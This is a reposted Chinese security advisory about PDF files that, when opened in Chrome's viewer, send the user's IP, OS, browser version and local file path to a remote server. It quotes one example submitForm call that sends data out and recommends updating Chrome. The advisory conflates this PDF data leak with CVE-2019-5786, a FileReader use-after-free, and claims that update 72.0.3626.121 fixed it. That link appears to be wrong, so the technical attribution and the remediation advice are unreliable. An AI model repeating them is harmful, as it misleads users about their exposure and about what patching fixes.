Chrome中通过打开pdf文件泄露信息0day预警

作者:???深圳市网安计算机安全检测技术有限公司 2019/03/09 14:18:05 379次阅读 国际

一、概述

201812月起,EdgeSpot研究人员检测到利用Google Chrome 0 day漏洞的多个PDF样本。当用户用Chrome作为本地PDF阅读器打开恶意PDF样本,打开后会产生一些可疑的流量,用户查看PDF文件时,该PDF实际上是在与C2服务器进行通信。根据HTTP包的信息,被收集和发送的用户信息包括: 用户的公网IP地址,OSChrome版本,PDF文件在用户电脑中的完整路径,已经出现多个利用该漏洞的野外样本。直到201936日, chrome浏览器发布版本更新(72.0.3626.119->72.0.3626.121),才修复了在野利用的CVE-2019-5786,该漏洞危害较为严重,影响较大。

8455fb9a435ec047a36f76933dfdfaa9.png

bd84cf24f6191d509cd40db7ac07ce0f.png

二、技术细节

CVE-2019-5786是位于FileReader中的UAF漏洞,由Google’s Threat Analysis GroupClement Lecigne2019-02-27报告,其安全漏洞(CVE-2019-5786)是ChromeFileReader中的一个漏洞,这是一个所有主流Web浏览器用来允许Web应用程序读取存储在用户本地计算机上的文件内容的界面。当应用程序尝试访问系统内存时,即使它已被释放,也会发生这些错误。这可能导致程序崩溃或导致黑客可以用来运行恶意代码的内存损坏。漏洞的根源在于this.submitForm()这个PDF Javascript API。像this.submitForm(‘http://google.com/test‘)这样一个简单的调用就会导致Chrome把个人信息发送到google.com

23b6fc78be1288ed5378bf69b436b6d1.png? ? ?67a47053da8689039e5ba4c2667a8100.png

三、安全建议

因此,如果您在WindowsMacOSLinux上使用Chrome,请确保您使用的是最新版本72.0.3626.121。使用chrome浏览器的用户请打开chrome://settings/help页面查看当前浏览器版本,如果不是最新版(72.0.3626.121)会自动检查升级,重启之后即可更新到最新版。2748df20cabef2611a12d2d37ea2bda4.png

四、参考链接

参考链接: https://www.komando.com/happening-now/553108/zero-day-attacks-found-in-google-chrome-update-your-browser-now

参 考 链 接: https://www.anquanke.com/post/id/172383

参 考 链 接: https://www.anquanke.com/post/id/172035

?参考链接:?https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247491483&idx=1&sn=0b22ce00ca15043cf564f329c54b366e&chksm=e916cfa1de6146b7ce806c6c2d27485b3c0312dd6017beccafdd47fdc010a36be8286a0f8af2&mpshare=1&scene=1&srcid=0309z2aTns6CFU2cJ121MmZM#rd

?参考链接:?https://mp.weixin.qq.com/s?__biz=MzUxMDQzNTMyNg==&mid=2247485350&idx=1&sn=b471ec15997d42b4ee7abe4e0f0cfbb1&chksm=f9024d37ce75c42181302ca48a514e6ea196dff559657650a81779e25c0bb625b2d682b23fea&mpshare=1&scene=1&srcid=0307DMnBpZ8yGCP47ANgZwet#rd


指导单位
广东省公安厅网络警察总队 广东省信息安全等级保护协调小组办公室